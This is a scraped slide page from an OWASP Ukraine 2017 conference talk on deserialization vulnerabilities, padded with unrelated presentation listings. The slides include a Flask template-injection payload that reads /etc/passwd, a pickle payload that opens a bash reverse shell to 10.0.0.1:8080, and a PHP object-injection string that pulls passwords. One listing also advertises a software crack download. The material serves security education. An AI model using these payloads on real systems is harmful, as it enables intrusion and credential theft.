Vlada Kulish "Deserialization. What it is and how to hack it"

Dec 28, 2017Download as PPTX, PDF0 likes202 views

Vlada Kulish shared us really technical topic about Deserialization or how one small object can break all your security. OWASP Ukraine 2017 Security Conference https://www.facebook.com/events/914991308665427/

Vlada Kulish "Deserialization. What it is and how to hack it"

Security Engineer
OWASP Lviv member
Vlada Kulish

2% 6%
8%
62%
4%
2%
2%
14%
Bypass
DoS
DoS Exec Code
Exec Code
Exec Code Bypass
Exec Code CSRF
Priv
unspesified

.Net
6%
Java
63%
JavaScript
4%
Jython
2%
php
11%
Python
2%
Ruby
2% XML
2%
YAML
8%

http://address/injectedData Server Template
{{5*5}} {{5*5}}
25

$@app.errorhandler(404) def page_not_found(e): template = '''{%% extends "layout.html" %%} {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.url) return render_template_string(template), 404 {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>aaa{{5*5}}</h3> </div> {%% endblock %%}$

${{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}$

${{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} <type 'str'>, <type 'basestring'>, <type 'object'>.__class__.__mro__ [<type 'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>….].__subclasses__()$

Pickle
Protocol v.0 – ACSII
Protocol v.1 – Old binary format
Protocol v.2 – New binary format

Old <Legitimate pickle>
New <Inserted shellcode>
Result Result of inserted shellcode, likely an error

Old <Legitimate pickle>
New <Shellcode and some empty stack><Legitimate pickle>
Result Original object

Old <Legitimate pickle>…S’<html><h1>AAA…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><h1>Surprise!…’n
<Legitimate pickle>
Result Identically-typed object to original with altered attribute value

Old <Legitimate pickle>…S’<html><body>Foo…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><body>
<Instruction returning string>…’n
<Legitimate pickle>
Result Identically-typed object to original with new attribute value
assigned by executed instructions

import pickle
import socket
import os
class payload(object):
def __reduce__(self):
comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
return (os.system, (comm,))
payload = pickle.dumps( payload())

? http://media.blackhat.com/bh-us-
11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
? https://exploit-exercises.com/nebula/level17/
? https://blog.nelhage.com/2011/03/exploiting-pickle/

CVE-2013-0156 Ruby on Rails XML processor YAML deserialization
code execution
Unsafe Object Deserialization Vulnerability in
RubyGems
CVE-2017-0903

Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies
<div class="content">
<%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %>
…
</div>

http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-
0156/
http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-
vulnerability-explained/
https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml-
vulnerability/
https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Execution

$if (isset ($_COOKIE['leet_hax0r'])) { $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r'])); …} a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"query";s:38:"SELE CT password AS username FROM users";s:4:"conn";N;}}$

CVE-2015-8562: Joomla Remote Code Execution
CVE-2015-7808: vBulletin 5 Unserialize Code Execution
CVE-2015-2171: Slim Framework PHP Object Injection

https://www.owasp.org/index.php/PHP_Object_Injection
https://www.tarlogic.com/en/blog/how-php-object-injection-works-php-
object-injection/
https://pagely.com/blog/2017/05/php-object-injection-insecure-
unserialize-wordpress

This document provides an overview of Mozilla Web Apps including: - Web Apps can run on platforms like Windows, Mac, Android and more. - They are built with open web technologies like HTML5, CSS, and JavaScript. - A manifest file is needed to define the app and install it using the Mozilla Labs App Runtime extension. - Web Apps can use features like offline storage, IndexedDB, and fullscreen mode.

How do speed up web pages? CSS & HTML TricksCompare Infobase Limited

The document discusses several techniques for optimizing web page performance including: 1. Using CSS shorthand properties to reduce code and specify font styles concisely. 2. Applying multiple classes to an element to combine styles from different classes. 3. Creating CSS sprites to reduce HTTP requests by combining images into a single file. 4. A few other techniques like cross-browser opacity, text wrapping, and Google web fonts.

Sql injection@x0mg

1. The document discusses various SQL injection vulnerabilities and techniques for exploiting them, including on Metasploitable, DVWA, and Sqli-labs platforms. 2. It provides examples of payloads to extract database, table, and user information from Sqli-labs lessons 29, 32, 33, and 36. 3. The document also discusses challenges of SQL injection on MySQL databases using GBK encoding, and mitigations like addslashes(), preg_replace(), and mysql_real_escape_string().

Rails Cachewear

This document discusses caching techniques in Rails, including page caching, action caching, and fragment caching. Page caching stores entire static HTML pages to serve cached content quickly without running Rails. Action caching runs controllers but caches output. Fragment caching caches portions of views. Caches can be expired based on model changes or timed expiration. Plugins like cache_fu and sweeper generators help manage caching.

Simple restfull app_snetwix

This document discusses using the inherited_resources gem to simplify the implementation of RESTful controllers in Rails applications. It allows controllers to inherit common RESTful actions and configuration. Key features covered include defining resource and collection methods, customizing responses, configuring actions, overwriting actions, and integrating with other libraries like Decent Exposure and Responders.

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...Priyanka Aash

When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks. The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking. Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.

Application Diagnosis with Zend Server TracingZendCon

This document discusses Application Diagnosis with Zend Server Tracing. It provides an overview of debugging applications, introduces Zend Server Tracing as a better way to debug than var_dump, and covers how Zend Server Tracing works including code tracing, monitoring modes, and settings. It provides examples of using code tracing to diagnose uncaught exceptions, destructors, prepared statements, and memory usage. The document encourages using Zend Server Tracing in development, testing, staging, and production environments.

Clearance: Simple, complete Ruby web app authentication.Jason Morrison

Magento - a Zend Framework ApplicationZendCon

This document discusses Magento, an open-source e-commerce platform built on the Zend Framework. It outlines how Magento utilizes around 15 Zend Framework components for functionality like controllers, views, caching, internationalization and databases. It also describes how additional Zend Framework components may be integrated in the future and how modules can extend and overwrite core Magento classes and functionality.

Breaking SAP portal (HashDays)ERPScan

Djangoアプリのデプロイに関するプラクティス / Deploy django applicationMasashi Shibata

This document contains notes from a meeting on web application security. It discusses several common vulnerabilities like SQL injection, cross-site scripting (XSS), and clickjacking. It provides examples of how these vulnerabilities can occur and ways to prevent them, such as sanitizing user input, enabling CSRF protection middleware, and using the X-Frame-Options header. Keywords discussed include MySQL, Docker, Kubernetes, Ansible, and various attack vectors like CSRF, XSS, SQL injection, and clickjacking. The document aims to educate on security best practices for Python and Django web applications.

Breaking SAP portal (DeepSec)ERPScan

Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security. SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored. The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.

Django の認証処理実装パターン / Django Authentication PatternsMasashi Shibata

Vlada Kulish - Why So Serial?OWASP Kyiv

This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.

Cross Site Scripting (XSS) Defense with JavaJim Manico

Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.

OWASP Top 10 - DrupalCon Amsterdam 2019Ayesh Karunaratne

Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia

This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.

presentation on java server pages vs servlet.pptansariparveen06

HTML5, the new buzzwordFrédéric Harper

PresentationManav Prasad

The document discusses Java servlets and Java Server Pages (JSP). It provides examples of HelloWorld servlets written in Java and JSP. It describes the basic lifecycle of servlets, how they interact with clients, and common tags used in JSP like comments, declarations, expressions and scriptlets. It also demonstrates using Java beans in JSP and an example to look up stock prices that retrieves data from a database using JDBC or alternatively by hardcoding logic based on the stock market source.

TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode

The document discusses the history and evolution of JavaScript packaging and module bundling from 2000 to the present. It covers early approaches using individual script tags to load JS files, the introduction of minification tools like JSMin in 2003, concatenating files together in the late 2000s, module loaders like RequireJS in 2009, the rise of Node.js and package managers in 2010, and the modern dominance of bundlers like Webpack since 2014 which use loaders to bundle dependencies and assets into single files or chunks.

Webpack Sofian Hadiwijaya

Webpack is a module bundler that packs JavaScript files and their dependencies into small bundles for efficient loading on the browser. It builds a dependency graph by walking through imports and outputs bundles or individual files. Loaders allow transforming assets and piping them together, like using babel-loader to transpile JSX to ES5 and css-loader to bundle CSS. This summarizes the key points about Webpack's purpose, how it builds dependencies, and the role of loaders.

Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis

Webpack packing it allCriciúma Dev

Derek Willian Stavis (Pagar.me) Todo mundo diz que Webpack é só um module bundler. Mas o que é um módulo? O que é um bundler? Porque precisamos disso? Vamos caminhar pela história do desenvolvimento web para entender estes conceitos, e no final vamos dissecar a configura??o e o output do Webpack para entendermos como ele funciona e como ele pode facilitar o seu processo de desenvolvimento. Vale do Carbono Conference

XSS Defence with @manicode and @eoinkearyEoin Keary

The document discusses various techniques for preventing cross-site scripting (XSS) attacks, including encoding untrusted data for different contexts, using content security policy (CSP), and jQuery encoding plugins. It provides examples of using encoding libraries like OWASP Encoder to sanitize input for HTML, JavaScript, CSS, and more. It also describes DOM-based XSS defenses, avoiding dangerous jQuery methods, and the structure of CSP violation reports.

Debugging WordPressMario Peshev

Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra

Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd

This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.

Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer

Früher war alles besser - sowieso! Konnte man vor 20 Jahren alleine mit HTML einen Webauftritt gestalten, hat sich die Anzahl der Technologien, die eine Webentwicklerin beherrschen muss, vervielfacht. Was ist wichtig, was unwichtig? In diesem Vortrag beleuchtet Jens-Christian den aktuellen Zoo von Technologien, und zeigt auf, wie sich diese Vielfalt sinnvoll b?ndigen l?sst. HTML(5), CSS(3), JavaScript, CoffeeScript, JavaScript Frameworks (jQuery, Prototype, Moo, Dojo, Ext, ...), JavaScript Microframeworks (Backbone, Ember, Flatiron), Templatingsprachen, Hilfsmittel zur Gestaltung von CSS (SASS, SCSS), Responsive Design, Browsererkennung, Caching, Performancetweaks, Testing und vieles mehr wird thematisiert.

More Related Content

What's hot (6)

Clearance: Simple, complete Ruby web app authentication.Jason Morrison

Magento - a Zend Framework ApplicationZendCon

Breaking SAP portal (HashDays)ERPScan

Djangoアプリのデプロイに関するプラクティス / Deploy django applicationMasashi Shibata

Breaking SAP portal (DeepSec)ERPScan

Django の認証処理実装パターン / Django Authentication PatternsMasashi Shibata

Clearance: Simple, complete Ruby web app authentication.Jason Morrison

Magento - a Zend Framework ApplicationZendCon

Breaking SAP portal (HashDays)ERPScan

Djangoアプリのデプロイに関するプラクティス / Deploy django applicationMasashi Shibata

Breaking SAP portal (DeepSec)ERPScan

Django の認証処理実装パターン / Django Authentication PatternsMasashi Shibata

Similar to Vlada Kulish "Deserialization. What it is and how to hack it" (20)

Vlada Kulish - Why So Serial?OWASP Kyiv

Cross Site Scripting (XSS) Defense with JavaJim Manico

OWASP Top 10 - DrupalCon Amsterdam 2019Ayesh Karunaratne

Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia

presentation on java server pages vs servlet.pptansariparveen06

HTML5, the new buzzwordFrédéric Harper

PresentationManav Prasad

TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode

Webpack Sofian Hadiwijaya

Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis

Webpack packing it allCriciúma Dev

XSS Defence with @manicode and @eoinkearyEoin Keary

Debugging WordPressMario Peshev

Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra

Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd

Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer

Php web backdoor obfuscationSandro Zaccarini

This document summarizes Sandro "guly" Zaccarini's presentation on PHP web backdoor obfuscation techniques at EndSummerCamp 2k15. The presentation covers placing backdoors in PHP websites, different methods for executing code through PHP, real world examples of obfuscated backdoors found in the wild, and vulnerabilities that can enable backdoor execution. The goal is to demonstrate how PHP backdoors can be hidden through obfuscation and exploit vulnerabilities.

Brian hogg word camp preparing a plugin for translationwcto2017

CodeIgniter i18n Security FlawAbbas Naderi

This document discusses a code injection vulnerability in the internationalization (i18n) functionality of the CodeIgniter PHP web framework. Specifically, it shows how an attacker could exploit weaknesses in CodeIgniter's handling of localized language files to perform remote file inclusion (RFI) or local code inclusion attacks. The document provides examples of how an attacker could craft malicious input to include arbitrary files or code from remote or local systems. It also notes that over 240 existing CodeIgniter sites were found potentially vulnerable to this issue. In conclusion, the document invites questions and feedback on this CodeIgniter i18n code injection vulnerability.

Webové aplikace v JavaScriptuPavol Hejn?

Vlada Kulish - Why So Serial?OWASP Kyiv

Cross Site Scripting (XSS) Defense with JavaJim Manico

OWASP Top 10 - DrupalCon Amsterdam 2019Ayesh Karunaratne

Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia

presentation on java server pages vs servlet.pptansariparveen06

HTML5, the new buzzwordFrédéric Harper

PresentationManav Prasad

TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode

Webpack Sofian Hadiwijaya

Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis

Webpack packing it allCriciúma Dev

XSS Defence with @manicode and @eoinkearyEoin Keary

Debugging WordPressMario Peshev

Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra

Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd

Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer

Php web backdoor obfuscationSandro Zaccarini

Brian hogg word camp preparing a plugin for translationwcto2017

CodeIgniter i18n Security FlawAbbas Naderi

Webové aplikace v JavaScriptuPavol Hejn?

More from Igor Beliaiev (7)

Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev

Volodymyr Kimak "Security Tips for Android App"Igor Beliaiev

Security Walls in Linux Environment: Practice, Experience, and ResultsIgor Beliaiev

Hacking a companyIgor Beliaiev

Security Hole #18 - Cryptolocker RansomwareIgor Beliaiev

Security Hole #18 - Security MattersIgor Beliaiev

This document discusses the risks small companies face from cyber attacks even though they think they are not important targets. It notes that while companies may think a hack will not happen, it is not a question of if but when. The consequences of a security failure include loss of trust, money, data, time to recover, and penalties. It then explores how non-critical applications and registration pages can still be vulnerable to hackers bypassing client-side restrictions and gaining database access, allowing them to change passwords or access sensitive information.

Security Hole #11 - Competitive intelligenceIgor Beliaiev

Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev

Volodymyr Kimak "Security Tips for Android App"Igor Beliaiev

Security Walls in Linux Environment: Practice, Experience, and ResultsIgor Beliaiev

Hacking a companyIgor Beliaiev

Security Hole #18 - Cryptolocker RansomwareIgor Beliaiev

Security Hole #18 - Security MattersIgor Beliaiev

Security Hole #11 - Competitive intelligenceIgor Beliaiev

Recently uploaded (20)

What Makes "Deep Research"? A Dive into AI AgentsZilliz

About this webinar: Unless you live under a rock, you will have heard about OpenAI’s release of Deep Research on Feb 2, 2025. This new product promises to revolutionize how we answer questions requiring the synthesis of large amounts of diverse information. But how does this technology work, and why is Deep Research a noticeable improvement over previous attempts? In this webinar, we will examine the concepts underpinning modern agents using our basic clone, Deep Searcher, as an example. Topics covered: Tool use Structured output Reflection Reasoning models Planning Types of agentic memory

Computational Photography: How Technology is Changing Way We Capture the WorldHusseinMalikMammadli

? Computational Photography (Computer Vision/Image): How Technology is Changing the Way We Capture the World He? dü?ünmüsünüzmü, müasir smartfonlar v? kameralar nec? bu q?d?r g?z?l g?rüntül?r yarad?r? Bunun sirri Computational Fotoqrafiyas?nda(Computer Vision/Imaging) gizlidir—??kill?ri ??km? v? emal etm? üsulumuzu t?kmill??dir?n, kompüter elmi il? fotoqrafiyan?n inqilabi birl??m?si.

SMART SENTRY CYBER THREAT INTELLIGENCE IN IIOTTanmaiArni

AIXMOOC 2.3 - Modelli di reti neurali con esperimenti di addestramentoAlessandro Bogliolo

How Discord Indexes Trillions of Messages: Scaling Search Infrastructure by V...ScyllaDB

Gojek Clone Multi-Service Super App.pptxV3cube

Integrated Operating Window - A Gateway to PMFarhan Tariq

World Information Architecture Day 2025 - UX at a CrossroadsJoshua Randall

User Experience stands at a crossroads: will we live up to our potential to design a better world? or will we be co-opted by “product management” or another business buzzword? Looking backwards, this talk will show how UX has repeatedly failed to create a better world, drawing on industry data from Nielsen Norman Group, Baymard, MeasuringU, WebAIM, and others. Looking forwards, this talk will argue that UX must resist hype, say no more often and collaborate less often (you read that right), and become a true profession — in order to be able to design a better world.

Backstage Software Templates for Java DevelopersMarkus Eisele

A Framework for Model-Driven Digital Twin EngineeringDaniel Lehner

Stronger Together: Combining Data Quality and Governance for Confident AI & A...Precisely

TrustArc Webinar - Building your DPIA/PIA Program: Best Practices & TipsTrustArc

Understanding DPIA/PIAs and how to implement them can be the key to embedding privacy in the heart of your organization as well as achieving compliance with multiple data protection / privacy laws, such as GDPR and CCPA. Indeed, the GDPR mandates Privacy by Design and requires documented Data Protection Impact Assessments (DPIAs) for high risk processing and the EU AI Act requires an assessment of fundamental rights. How can you build this into a sustainable program across your business? What are the similarities and differences between PIAs and DPIAs? What are the best practices for integrating PIAs/DPIAs into your data privacy processes? Whether you're refining your compliance framework or looking to enhance your PIA/DPIA execution, this session will provide actionable insights and strategies to ensure your organization meets the highest standards of data protection. Join our panel of privacy experts as we explore: - DPIA & PIA best practices - Key regulatory requirements for conducting PIAs and DPIAs - How to identify and mitigate data privacy risks through comprehensive assessments - Strategies for ensuring documentation and compliance are robust and defensible - Real-world case studies that highlight common pitfalls and practical solutions

Technology use over time and its impact on consumers and businesses.pptxkaylagaze

Wondershare Filmora Crack 14.3.2.11147 Latestudkg888

https://ncracked.com/7961-2/ Note: >> Please copy the link and paste it into Google New Tab now Download link Free Download Wondershare Filmora 14.3.2.11147 Full Version - All-in-one home video editor to make a great video.Free Download Wondershare Filmora for Windows PC is an all-in-one home video editor with powerful functionality and a fully stacked feature set. Filmora has a simple drag-and-drop top interface, allowing you to be artistic with the story you want to create.Video Editing Simplified - Ignite Your Story. A powerful and intuitive video editing experience. Filmora 10 hash two new ways to edit: Action Cam Tool (Correct lens distortion, Clean up your audio, New speed controls) and Instant Cutter (Trim or merge clips quickly, Instant export).Filmora allows you to create projects in 4:3 or 16:9, so you can crop the videos or resize them to fit the size you want. This way, quickly converting a widescreen material to SD format is possible.

MIND Revenue Release Quarter 4 2024 - Finacial PresentationMIND CTI

UiPath Document Understanding - Generative AI and Active learning capabilitiesDianaGray10

This session focus on Generative AI features and Active learning modern experience with Document understanding. Topics Covered: Overview of Document Understanding How Generative Annotation works? What is Generative Classification? How to use Generative Extraction activities? What is Generative Validation? How Active learning modern experience accelerate model training? Q/A ? If you have any questions or feedback, please refer to the "Women in Automation 2025" dedicated Forum thread. You can find there extra details and updates.

Q4 2024 Earnings and Investor PresentationDropbox

Inside Freshworks' Migration from Cassandra to ScyllaDB by Premkumar PatturajScyllaDB

BoxLang JVM Language : The Future is DynamicOrtus Solutions, Corp

Just like life, our code must evolve to meet the demands of an ever-changing world. Adaptability is key in developing for the web, tablets, APIs, or serverless applications. Multi-runtime development is the future, and that future is dynamic. Enter BoxLang: Dynamic. Modular. Productive. (www.boxlang.io) BoxLang transforms development with its dynamic design, enabling developers to write expressive, functional code effortlessly. Its modular architecture ensures flexibility, allowing easy integration into your existing ecosystems. Interoperability at Its Core BoxLang boasts 100% interoperability with Java, seamlessly blending traditional and modern development practices. This opens up new possibilities for innovation and collaboration. Multi-Runtime Versatility From a compact 6MB OS binary to running on our pure Java web server, CommandBox, Jakarta EE, AWS Lambda, Microsoft Functions, WebAssembly, Android, and more, BoxLang is designed to adapt to any runtime environment. BoxLang combines modern features from CFML, Node, Ruby, Kotlin, Java, and Clojure with the familiarity of Java bytecode compilation. This makes it the go-to language for developers looking to the future while building a solid foundation. Empowering Creativity with IDE Tools Unlock your creative potential with powerful IDE tools designed for BoxLang, offering an intuitive development experience that streamlines your workflow. Join us as we redefine JVM development and step into the era of BoxLang. Welcome to the future.

FinTech - US Annual Funding Report - 2024.pptxTracxn

What Makes "Deep Research"? A Dive into AI AgentsZilliz

Computational Photography: How Technology is Changing Way We Capture the WorldHusseinMalikMammadli

SMART SENTRY CYBER THREAT INTELLIGENCE IN IIOTTanmaiArni

AIXMOOC 2.3 - Modelli di reti neurali con esperimenti di addestramentoAlessandro Bogliolo

How Discord Indexes Trillions of Messages: Scaling Search Infrastructure by V...ScyllaDB

Gojek Clone Multi-Service Super App.pptxV3cube

Integrated Operating Window - A Gateway to PMFarhan Tariq

World Information Architecture Day 2025 - UX at a CrossroadsJoshua Randall

Backstage Software Templates for Java DevelopersMarkus Eisele

A Framework for Model-Driven Digital Twin EngineeringDaniel Lehner

Stronger Together: Combining Data Quality and Governance for Confident AI & A...Precisely

TrustArc Webinar - Building your DPIA/PIA Program: Best Practices & TipsTrustArc

Technology use over time and its impact on consumers and businesses.pptxkaylagaze

Wondershare Filmora Crack 14.3.2.11147 Latestudkg888

MIND Revenue Release Quarter 4 2024 - Finacial PresentationMIND CTI

UiPath Document Understanding - Generative AI and Active learning capabilitiesDianaGray10

Q4 2024 Earnings and Investor PresentationDropbox

Inside Freshworks' Migration from Cassandra to ScyllaDB by Premkumar PatturajScyllaDB

BoxLang JVM Language : The Future is DynamicOrtus Solutions, Corp

FinTech - US Annual Funding Report - 2024.pptxTracxn

Vlada Kulish "Deserialization. What it is and how to hack it"

2. Security Engineer OWASP Lviv member Vlada Kulish

4. Deserialize Serialize

7. 2% 6% 8% 62% 4% 2% 2% 14% Bypass DoS DoS Exec Code Exec Code Exec Code Bypass Exec Code CSRF Priv unspesified

8. .Net 6% Java 63% JavaScript 4% Jython 2% php 11% Python 2% Ruby 2% XML 2% YAML 8%

9. http://address/injectedData Server Template {{5*5}} {{5*5}} 25

10. @app.errorhandler(404) def page_not_found(e): template = '''{%% extends "layout.html" %%} {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.url) return render_template_string(template), 404 {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>aaa{{5*5}}</h3> </div> {%% endblock %%}

11. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

12. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} <type 'str'>, <type 'basestring'>, <type 'object'>.__class__.__mro__ [<type 'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>….].__subclasses__()

13. type class object subclas s type params

14. Pickle Protocol v.0 – ACSII Protocol v.1 – Old binary format Protocol v.2 – New binary format

15. Instructure engine Stack Memo

17. Old <Legitimate pickle> New <Inserted shellcode> Result Result of inserted shellcode, likely an error

18. Old <Legitimate pickle> New <Shellcode and some empty stack><Legitimate pickle> Result Original object

19. Old <Legitimate pickle>…S’<html><h1>AAA…’n <Legitimate pickle> New <Legitimate pickle>…S’<html><h1>Surprise!…’n <Legitimate pickle> Result Identically-typed object to original with altered attribute value

20. Old <Legitimate pickle>…S’<html><body>Foo…’n <Legitimate pickle> New <Legitimate pickle>…S’<html><body> <Instruction returning string>…’n <Legitimate pickle> Result Identically-typed object to original with new attribute value assigned by executed instructions

23. import pickle import socket import os class payload(object): def __reduce__(self): comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" return (os.system, (comm,)) payload = pickle.dumps( payload())

24. ? http://media.blackhat.com/bh-us- 11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf ? https://exploit-exercises.com/nebula/level17/ ? https://blog.nelhage.com/2011/03/exploiting-pickle/

28. CVE-2013-0156 Ruby on Rails XML processor YAML deserialization code execution Unsafe Object Deserialization Vulnerability in RubyGems CVE-2017-0903

29. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies <div class="content"> <%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %> … </div>

30. http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013- 0156/ http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution- vulnerability-explained/ https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml- vulnerability/ https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Execution

31. __destruct() __wakeup()

32. if (isset ($_COOKIE['leet_hax0r'])) { $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r'])); …} a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"query";s:38:"SELE CT password AS username FROM users";s:4:"conn";N;}}

33. CVE-2015-8562: Joomla Remote Code Execution CVE-2015-7808: vBulletin 5 Unserialize Code Execution CVE-2015-2171: Slim Framework PHP Object Injection

34. https://www.owasp.org/index.php/PHP_Object_Injection https://www.tarlogic.com/en/blog/how-php-object-injection-works-php- object-injection/ https://pagely.com/blog/2017/05/php-object-injection-insecure- unserialize-wordpress

狠狠撸

Vlada Kulish "Deserialization. What it is and how to hack it"

Recommended

More Related Content

What's hot (6)

Similar to Vlada Kulish "Deserialization. What it is and how to hack it" (20)

More from Igor Beliaiev (7)

Recently uploaded (20)

Vlada Kulish "Deserialization. What it is and how to hack it"